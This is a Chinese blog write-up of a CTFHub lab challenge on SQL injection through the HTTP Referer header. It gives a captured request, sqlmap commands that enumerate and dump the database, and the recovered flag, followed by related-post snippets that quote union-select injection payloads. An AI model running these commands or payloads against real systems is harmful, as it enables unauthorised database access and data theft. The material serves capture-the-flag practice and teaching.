CTFHUB-SQL注入-refer注入

最新推荐文章于 2024-04-09 21:52:17 发布
最新推荐文章于 2024-04-09 21:52:17 发布
阅读量457 收藏 1
点赞数
分类专栏: CTFHUB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014794539/article/details/118635299
版权

考点
sql refer注入
过程分析
hackbar发送refer
在这里插入图片描述
然后发送repeater抓包
在这里插入图片描述

GET / HTTP/1.1
Host: challenge-966dbd291ece3e1d.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: http://challenge-966dbd291ece3e1d.sandbox.ctfhub.com:10080
Connection: close
Referer: http://challenge-966dbd291ece3e1d.sandbox.ctfhub.com:10080/
Upgrade-Insecure-Requests: 1
Referer:1

把左边 也就是以上信息粘贴到txt里 放到sqlmap目录下

python2 sqlmap.py -r "123.txt" -p referer --level 5 --dbs

python2 sqlmap.py -r "123.txt" -p referer --level 5 -D sqli --tables
 
python2 sqlmap.py -r "123.txt" -p referer --level 5 -D sqli -T jhrmwuuevc --columns --dump


还是和别的一样的流程 得到表名jhrmwuuevc
在这里插入图片描述
然后爆表 得到flag

ctfhub{742f7e2bba0c7231699df019}
Pale1c
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfhub——web——sql注入(sqlmap实现)
weixin_43906500的博客
05-13 1679
本次sql注入全部基于sqlmap实现 1.整数型注入 题目如下,为整数型注入 1.1安装sqlmap sudo apt install sqlmap 1.2测试注入 sqlmap -u http://challenge-3c2c0ebf73b7a689.sandbox.ctfhub.com:10080/?id=1 成功注入 1.3查看数据库 执行命令 sqlmap -u http://challenge-3c2c0ebf73b7a689.sandbox.ctfhub.
CTFhub Refer注入
plant1234的博客
06-18 1324
Refer注入: 这道题首先我自己一开始也有点乱,找不到referer在哪里 但根据大佬的博客:https://blog.csdn.net/qq_37450949/article/details/117003065 提示的话知道,referer的一些知识: HTTP_REFERER简介 HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 这句话的意思就是,只有当你向浏
CTFHUB-技能树-Web题-SQL注入-Mysql结构-Refer注入
Static______的博客
04-09 1328
HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。用bp抓到包后,将页面中的数据保存到一个txt文件中,用sqlmap爆破(根据reger注入level需要大于三)也就是说,只有当你向浏览器发送请求时,才会带上referer。得到两个表名,第一张表看名字像是自定义的表,尝试爆破第一张表。-p 指定参数,这里为 -p “id”1,2都显示,有两个回显字段。
CTFHub | Refer注入
尼泊罗河伯的博客
11-26 1695
根据题目显示内容,此题和上一题一致,需要在 Refer 请求头中进行 SQL 注入。那么直接使用 burp suite 抓包工具抓取题目网站的信息,并将抓取到的数据发送给重放器。在 Refer请求中使用 payload 进行测试,发现此题存在 Refer注入。那么直接根据注入流程进行注入,最后发现此题 flag 存在于 ncdiyxjtck 数据中。
CTFHub技能树web(持续更新)--SQL注入--Refer注入
jiuyongpinyin的博客
09-06 510
Refer注入 首先根据题目提示,实在referer处输入id,那么我们先抓包: 那么我们在发送包的时候携带上这个参数: 这里有回显了,接下来的事情就好办了,先通过order by语句查询几列,发现两列的时候回显正常,接着我们使用联合查询: 这里注入成功了,我们爆破当前数据库: 得到数据库,爆破数据库里面的表名: 得到了奇怪的表名,查看这个表名里面的列: 得到列名,之后爆破里面的字段: 得到flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。 ...
ctfhub技能树—SQL注入—referer注入
Naptmn的博客
02-07 1223
referer是什么? HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 还是bp抓包 但是这次包中没有referer这个部分 所以我们需要添加一下(在headers中选add) 之后就可以在refere开始常规注入了 1、找位点 2、数据库名 3、表名 4、列名 5、查看数据 得到flag ...
flume-ng-sql-source-release-1.5.2.zip
06-26
Flume-ng-sql-source是Apache Flume的一个扩展插件,主要功能是允许用户从各种数据库中抽取数据并将其传输到其他目的地,如Apache Kafka。在本案例中,我们讨论的是版本1.5.2的发布包,即"flume-ng-sql-source-...
SQL注入思路详解
12-14
一、SQL注入可以分为三个步骤 1.识别Web应用与数据库交互的可能输入(识别潜在注入点) 2.SQL注入语句测试 3.根据服务器返回判定注入语句是否影响了SQL执行结果以判断是否存在SQL注入     2.识别Web应用与数据库...
Refer - Web Clipper-crx插件
04-04
"Refer - Web Clipper-crx插件"是一个适用于多种Web浏览器的扩展程序,它提供了丰富的功能,帮助用户高效地捕获、保存和管理网络上的信息。这个插件的核心特性包括视频笔记、屏幕截图以及文本和图像的提取。下面将...
JApiDocs-master.zip
最新发布
06-07
JApiDocs is implemented by parsing Java source code. To make JApiDocs work correctly, you need to follow certain...You can refer the SpringDemo module in the source code for comparison and understanding.
CTFHUB-Cookie注入
Web学习之路
03-28 202
cookie啊
[CTFhub]CTFhub技能树SQL注入——Refer注入
KKleeeaa的博客
04-05 458
提示:本文章仅限学习参考,切勿用于非法用途。
ctfhub Refer注入
weixin_43326436的博客
06-10 900
1,实验环境 ctfhubsql注入 2.工具 火狐浏览器,火狐浏览器插件hackbar(可以安装,百度。。。) 直接抓包,但是会看到没有我们想要的refer这个字样,我们在hackerbar里面输出需要的参数,id=1,提交时抓包,抓到我们所需要的字样。 3.在bp中refer字段这里进行爆库,输入123 union select (database()),2 # 后点击forward放包步骤接下来一样) 显示出了数据库是sqli 继续爆表 123 union select (select group_c
CTFHub - Refer注入
Have_a_great_day的博客
09-12 595
table_schema=database() :table_schema表示要筛选的表的模式(也就是数据库的名称),而database()是MySQL内置函数,返回当前连接的数据库名称。information_schema:是 information_schema 数据库中的一个表,用于存储关于数据库中所有表的信息,例:表名、所属数据库、表类型、创建时间等。group_concat(列或表达式):函数将指定的列或表达式的值按照默认的逗号分隔符连接起来,并返回一个合并的字符串作为结果。
CTFHub-referer注入
m0_51589948的博客
05-19 854
referer注入 根据提示寻找referer,对其进行bp抓包,并发包到repeater 对referer进行注入判断 -1 union select 1,2 在注入后回显并显示内容,判断为Cookie注入,按照正常的注入流程获取flag -1 union select database(),1 查库名 然后查询数据库的表名 -1 union select 1,group select(table_name) feom information_schema.table where table_sche
CTFHUB——Cookie、User-Agent、Referer注入 writeup
wuuconix's blog
08-29 744
背景 我们一般做sql注入的时候,注入点一般都是一个文本框,然后我们可以通过输入某种特殊的语句来获得数据库中的信息,但是有时候这种注入点可不一定给你一个文本框,而可能在请求包中的其他地方。 接下来我分享一下CTFHUB中的三道题,它们的注入点分别是请求包中的Cookie、User-Agent和Referer。它们只是注入点不同,基于的的注入方式都是最基本的union联合注入。所以它们的payload都十分简单和相似。 在这次做题过程中,我还尝试了强大的sqlmap,成功得到了一些结果。 SQL注入——Coo
CTFHub——技能树——SQL注入(sqlmap)
sparename的博客
12-26 6958
SQL注入整数型注入sqlmap简介检测注入实战解题字符型注入报错注入布尔盲注时间盲注MySQL结构Cookie注入UA注入Refer注入过滤空格 整数型注入 sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用u
2021-7-1sqlmap解决ctfhub的sql部分注入题型
qq_45290991的博客
07-01 259
一、cookie注入 二、UA注入 这个真的很难,sqlmap跑了好久……一直测不出来,,不知道为什么,参数也没错啊…… 三、refer注入 https://www.cnblogs.com/0yst3r-2046/p/12493132.html 可以参考这个,,最后一个类型是真的不想跑了 很卡…… ...
CTFHUB-WEB-SQL注入-Refer注入
weixin_43486981的博客
08-11 984
题目: 靶机环境: 使用burp suite 抓包,发现包信息中并没有refer字段。 根据提示,添加referer字段,进行注入 查看显示位 求数据库名 求表名 求列名 求字段值,得到flag
start-up error 03. refer easypbc user guide
01-12
start-up error 03是指在启动过程中出现的错误代码。根据错误提示,建议用户参考《easypbc用户指南》以了解更多相关信息。 在遇到start-up error 03时,用户可以首先查找《easypbc用户指南》中有关该错误代码的章节。该指南通常提供了各种错误代码及其对应的解决方案。 用户需要根据错误代码03的描述,找到相应的解决方案方法。指南中可能会提供一系列针对该错误的步骤或操作说明。用户需要按照指南的建议进行操作,逐步排除问题,并尝试修复错误。 如果用户在《easypbc用户指南》中找不到与start-up error 03相对应的章节,建议联系easypbc的技术支持团队以获取更多帮助。他们可能会要求进一步描述问题的细节或提供其他支持手段,以便尽快解决start-up error 03问题。 总结而言,start-up error 03是指在启动过程中出现的错误代码。获取《easypbc用户指南》,并参考其中的相关章节,将帮助用户理解该错误并采取适当的措施来解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值